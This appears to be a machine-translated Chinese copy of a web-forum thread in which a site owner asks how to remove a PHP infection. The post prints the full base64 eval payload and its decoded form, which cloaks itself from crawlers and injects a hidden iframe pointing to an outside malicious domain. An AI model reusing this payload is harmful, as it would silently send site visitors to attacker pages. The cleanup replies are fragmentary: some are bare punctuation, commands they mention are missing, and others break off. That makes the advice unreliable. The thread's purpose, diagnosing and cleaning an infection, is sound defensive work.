如何摆脱eval-base64_decode这样的PHP病毒文件?
|
我的网站(大型社区网站)最近感染了病毒。每个
index.php
文件都已更改,因此这些文件的php标记已更改为以下行:
<?php eval(base64_decode(\'ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1c2VyX2FnZW50X3RvX2ZpbHRlciA9IGFycmF5KCdib3QnLCdzcGlkZXInLCdzcHlkZXInLCdjcmF3bCcsJ3ZhbGlkYXRvcicsJ3NsdXJwJywnZG9jb21vJywneWFuZGV4JywnbWFpbC5ydScsJ2FsZXhhLmNvbScsJ3Bvc3RyYW5rLmNvbScsJ2h0bWxkb2MnLCd3ZWJjb2xsYWdlJywnYmxvZ3B1bHNlLmNvbScsJ2Fub255bW91c2Uub3JnJywnMTIzNDUnLCdodHRwY2xpZW50JywnYnV6enRyYWNrZXIuY29tJywnc25vb3B5JywnZmVlZHRvb2xzJywnYXJpYW5uYS5saWJlcm8uaXQnLCdpbnRlcm5ldHNlZXIuY29tJywnb3BlbmFjb29uLmRlJywncnJycnJycnJyJywnbWFnZW50JywnZG93bmxvYWQgbWFzdGVyJywnZHJ1cGFsLm9yZycsJ3ZsYyBtZWRpYSBwbGF5ZXInLCd2dnJraW1zanV3bHkgbDN1Zm1qcngnLCdzem4taW1hZ2UtcmVzaXplcicsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ3dvcmRwcmVzcycsJ3Jzc3JlYWRlcicsJ215YmxvZ2xvZyBhcGknKTsNCiRzdG9wX2lwc19tYXNrcyA9IGFycmF5KA0KCWFycmF5KCIyMTYuMjM5LjMyLjAiLCIyMTYuMjM5LjYzLjI1NSIpLA0KCWFycmF5KCI2NC42OC44MC4wIiAgLCI2NC42OC44Ny4yNTUiICApLA0KCWFycmF5KCI2Ni4xMDIuMC4wIiwgICI2Ni4xMDIuMTUuMjU1IiksDQoJYXJyYXkoIjY0LjIzMy4xNjAuMCIsIjY0LjIzMy4xOTEuMjU1IiksDQoJYXJyYXkoIjY2LjI0OS42NC4wIiwgIjY2LjI0OS45NS4yNTUiKSwNCglhcnJheSgiNzIuMTQuMTkyLjAiLCAiNzIuMTQuMjU1LjI1NSIpLA0KCWFycmF5KCIyMDkuODUuMTI4LjAiLCIyMDkuODUuMjU1LjI1NSIpLA0KCWFycmF5KCIxOTguMTA4LjEwMC4xOTIiLCIxOTguMTA4LjEwMC4yMDciKSwNCglhcnJheSgiMTczLjE5NC4wLjAiLCIxNzMuMTk0LjI1NS4yNTUiKSwNCglhcnJheSgiMjE2LjMzLjIyOS4xNDQiLCIyMTYuMzMuMjI5LjE1MSIpLA0KCWFycmF5KCIyMTYuMzMuMjI5LjE2MCIsIjIxNi4zMy4yMjkuMTY3IiksDQoJYXJyYXkoIjIwOS4xODUuMTA4LjEyOCIsIjIwOS4xODUuMTA4LjI1NSIpLA0KCWFycmF5KCIyMTYuMTA5Ljc1LjgwIiwiMjE2LjEwOS43NS45NSIpLA0KCWFycmF5KCI2NC42OC44OC4wIiwiNjQuNjguOTUuMjU1IiksDQoJYXJyYXkoIjY0LjY4LjY0LjY0IiwiNjQuNjguNjQuMTI3IiksDQoJYXJyYXkoIjY0LjQxLjIyMS4xOTIiLCI2NC40MS4yMjEuMjA3IiksDQoJYXJyYXkoIjc0LjEyNS4wLjAiLCI3NC4xMjUuMjU1LjI1NSIpLA0KCWFycmF5KCI2NS41Mi4wLjAiLCI2NS41NS4yNTUuMjU1IiksDQoJYXJyYXkoIjc0LjYuMC4wIiwiNzQuNi4yNTUuMjU1IiksDQoJYXJyYXkoIjY3LjE5NS4wLjAiLCI2Ny4xOTUuMjU1LjI1NSIpLA0KCWFycmF5KCI3Mi4zMC4wLjAiLCI3Mi4zMC4yNTUuMjU1IiksDQoJYXJyYXkoIjM4LjAuMC4wIiwiMzguMjU1LjI1NS4yNTUiKQ0KCSk7DQokbXlfaXAybG9uZyA9IHNwcmludGYoIiV1IixpcDJsb25nKCRfU0VSVkVSWydSRU1PVEVfQUREUiddKSk7DQpmb3JlYWNoICggJHN0b3BfaXBzX21hc2tzIGFzICRJUHMgKSB7DQoJJGZpcnN0X2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1swXSkpOyAkc2Vjb25kX2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1sxXSkpOw0KCWlmICgkbXlfaXAybG9uZyA+PSAkZmlyc3RfZCAmJiAkbXlfaXAybG9uZyA8PSAkc2Vjb25kX2QpIHskYm90ID0gVFJVRTsgYnJlYWs7fQ0KfQ0KZm9yZWFjaCAoJHVzZXJfYWdlbnRfdG9fZmlsdGVyIGFzICRib3Rfc2lnbil7DQoJaWYgIChzdHJwb3MoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddLCAkYm90X3NpZ24pICE9PSBmYWxzZSl7JGJvdCA9IHRydWU7IGJyZWFrO30NCn0NCmlmICghJGJvdCkgew0KZWNobyAnPGRpdiBzdHlsZT0icG9zaXRpb246IGFic29sdXRlOyBsZWZ0OiAtMTk5OXB4OyB0b3A6IC0yOTk5cHg7Ij48aWZyYW1lIHNyYz0iaHR0cDovL2x6cXFhcmtsLmNvLmNjL1FRa0ZCd1FHRFFNR0J3WUFFa2NKQlFjRUFBY0RBQU1CQnc9PSIgd2lkdGg9IjIiIGhlaWdodD0iMiI+PC9pZnJhbWU+PC9kaXY+JzsNCn0=\'));
当我对此进行解码时,它产生了以下PHP代码:
<?php
error_reporting(0);
$bot = FALSE ;
$user_agent_to_filter = array(\'bot\',\'spider\',\'spyder\',\'crawl\',\'validator\',\'slurp\',\'docomo\',\'yandex\',\'mail.ru\',\'alexa.com\',\'postrank.com\',\'htmldoc\',\'webcollage\',\'blogpulse.com\',\'anonymouse.org\',\'12345\',\'httpclient\',\'buzztracker.com\',\'snoopy\',\'feedtools\',\'arianna.libero.it\',\'internetseer.com\',\'openacoon.de\',\'rrrrrrrrr\',\'magent\',\'download master\',\'drupal.org\',\'vlc media player\',\'vvrkimsjuwly l3ufmjrx\',\'szn-image-resizer\',\'bdbrandprotect.com\',\'wordpress\',\'rssreader\',\'mybloglog api\');
$stop_ips_masks = array(
array(\"216.239.32.0\",\"216.239.63.255\"),
array(\"64.68.80.0\" ,\"64.68.87.255\" ),
array(\"66.102.0.0\", \"66.102.15.255\"),
array(\"64.233.160.0\",\"64.233.191.255\"),
array(\"66.249.64.0\", \"66.249.95.255\"),
array(\"72.14.192.0\", \"72.14.255.255\"),
array(\"209.85.128.0\",\"209.85.255.255\"),
array(\"198.108.100.192\",\"198.108.100.207\"),
array(\"173.194.0.0\",\"173.194.255.255\"),
array(\"216.33.229.144\",\"216.33.229.151\"),
array(\"216.33.229.160\",\"216.33.229.167\"),
array(\"209.185.108.128\",\"209.185.108.255\"),
array(\"216.109.75.80\",\"216.109.75.95\"),
array(\"64.68.88.0\",\"64.68.95.255\"),
array(\"64.68.64.64\",\"64.68.64.127\"),
array(\"64.41.221.192\",\"64.41.221.207\"),
array(\"74.125.0.0\",\"74.125.255.255\"),
array(\"65.52.0.0\",\"65.55.255.255\"),
array(\"74.6.0.0\",\"74.6.255.255\"),
array(\"67.195.0.0\",\"67.195.255.255\"),
array(\"72.30.0.0\",\"72.30.255.255\"),
array(\"38.0.0.0\",\"38.255.255.255\")
);
$my_ip2long = sprintf(\"%u\",ip2long($_SERVER[\'REMOTE_ADDR\']));
foreach ( $stop_ips_masks as $IPs ) {
$first_d=sprintf(\"%u\",ip2long($IPs[0])); $second_d=sprintf(\"%u\",ip2long($IPs[1]));
if ($my_ip2long >= $first_d && $my_ip2long <= $second_d) {$bot = TRUE; break;}
}
foreach ($user_agent_to_filter as $bot_sign){
if (strpos($_SERVER[\'HTTP_USER_AGENT\'], $bot_sign) !== false){$bot = true; break;}
}
if (!$bot) {
echo \'<div style=\"position: absolute; left: -1999px; top: -2999px;\"><iframe src=\"http://lzqqarkl.co.cc/QQkFBwQGDQMGBwYAEkcJBQcEAAcDAAMBBw==\" width=\"2\" height=\"2\"></iframe></div>\';
}
我已经尝试了几种方法来清除病毒,甚至是从备份中还原病毒,几分钟或几小时后文件也会再次受到感染。那你能帮我吗
您对这种病毒了解多少?
它用于安装和传播是否存在已知的安全漏洞?
上面的php代码实际上是做什么的?
它嵌入到iframe中的页面有什么作用?
当然,更重要的是:我该怎么做才能摆脱它?
请帮助,我们几乎没有想法和希望了:(
更新1
更多详细信息:一件奇怪的事:当我们第一次检查受感染的文件时。它们已更改,但在ftp程序中的修改时间显示在某些情况下,最后访问时间可能是几天,几个月甚至几年前!这怎么可能?它让我疯狂!
更新2
我认为该问题是在用户在其Wordpress安装中安装插件后引发的。从备份还原并完全删除Wordpress文件夹和关联的数据库后,问题似乎消失了。我们目前已经订阅了一项安全服务,他们正在调查该问题,以确保该黑客永久消失。感谢您的答复。
没有找到相关结果
已邀请:
7 个回复
献导外拘
2)从服务器下载所有文件的副本 将所有内容从良好的备份下载到单独的文件夹中。这可能需要一段时间(取决于您的站点大小,连接速度等)。 3)下载并安装文件/文件夹比较实用程序 在Windows计算机上,您可以使用WinMerge-http://winmerge.org/-它是免费的并且功能强大。 在MacOS机器上,从Alternative.to中检查可能的替代项列表。 4)运行文件/文件夹比较实用程序 您最终应该得到一些不同的结果: 文件相同-当前文件与您的备份相同,因此不受影响。 仅位于左侧/右侧的文件-该文件仅存在于备份中(可能已从服务器中删除),或者仅存在于服务器中(并且可能已被黑客注入/创建)。 文件不同-服务器上的文件与备份中的文件不同,因此它可能已经由您(为服务器配置)或由黑客(以注入代码)修改。 5)解决差异 (又名“为什么我们都不能相处呢?”) 对于相同的文件,无需采取进一步措施。 对于仅存在于一侧的文件,请查看该文件并确定它们是否合法(例如,用户上传的文件应该在那里,您可能已添加的其他文件,等等)。 对于不同的文件,请查看该文件(“文件差异实用程序”甚至可以显示已添加/修改/删除的行),并查看服务器版本是否有效。覆盖(使用备份版本)包含恶意代码的所有文件。 6)查看您的安全注意事项 无论是像更改FTP / cPanel密码那样简单,还是要检查对外部/不受控制的资源的使用(如您提到的,您正在执行很多fget,fopen等),您可能需要检查传递给它们的参数。是一种使脚本提取恶意代码的方法)等。 7)检查现场工程 在纠正了受感染的文件并删除了恶意文件之后,请利用机会成为唯一查看该网站的人,以确保一切都按预期进行。 8)打开门 撤消在步骤1中对.htaccess文件所做的更改。请仔细观察。密切注意您的访问者和错误日志,以查看是否有人试图触发已删除的恶意文件等。 9)考虑自动检测方法 有几种解决方案,可让您在主机上执行自动检查(使用CRON作业),该检查将检测并详细说明发生的任何更改。有些有点冗长(每个更改的文件都会收到一封电子邮件),但是您应该能够使它们适应您的需求: Tripwire-一个用于检测和报告新文件,删除文件或修改文件的PHP脚本 Shell脚本来监视文件更改 如何检测您的Web服务器是否被黑客入侵并收到警报 10)计划好备份,并保持良好的状态 确保已计划在网站上执行备份,并保留其中一些备份,以便您有不同的步骤,可以根据需要及时返回。例如,如果您执行每周备份,则可能需要保留以下内容: 4 x每周备份 4 x每月备份(您保留一个每周备份,可能是每月的第一周,作为每月备份) 如果您有人用比代码注入攻击更具破坏性的方式攻击您的站点,这些将使生活变得更加轻松。 哦,还要确保您也备份数据库-很多站点都是基于CMS的,文件很好,但是如果丢失/损坏了它们背后的数据库,那么备份基本上就没有用了。
呢率篓舍烫
视蕉梁拌客
使用类型 python rescue.py rootfolder 这是恶意脚本试图做的事情:
臂哦
,
,
, 等等 通过使用编码格式,它们缩小了尺寸,使经验不足的用户更难以解码。 以下是一些
命令,它们可能找到最常见的恶意软件PHP代码:
您可以在服务器上运行这些命令,也可以在将网站同步到本地计算机后(例如通过FTP
)运行这些命令。 或使用专为查找此类恶意文件而设计的扫描工具,请参阅:PHP安全扫描器。 出于教育目的,请找到以下PHP利用脚本集合,该集合是在kenorb / php-exploit-scripts GitHub(受@Mattias原始集合影响)上调查被黑客入侵的服务器时找到的。这将使您了解这些PHP可疑文件的外观,因此您可以学习如何在服务器上找到更多这些文件。 也可以看看: 这个恶意的PHP脚本有什么作用? Drupal:被黑客入侵后,如何从管理页面中删除恶意脚本?
剑哎
淘圃跺枯替
的输出与受保护的服务器进行比较,并检查
和
是否存在可疑文件。您可能必须重新安装操作系统。 确保管理服务器的所有工作站都是最新的并且干净的。不要通过不安全的无线连接进行连接,也不要像FTP一样使用纯文本身份验证(改为使用SFTP)。仅使用https登录控制面板。 为防止再次发生这种情况,请运行csf或类似的防火墙,每天进行LMD扫描,并为服务器上的所有应用程序获取最新的安全补丁程序。
徐百晴墓斜
这涵盖了所有已知的base64实现,并且无论base64文本用单引号还是双引号引起来都将起作用 编辑:现在也可以使用内部空格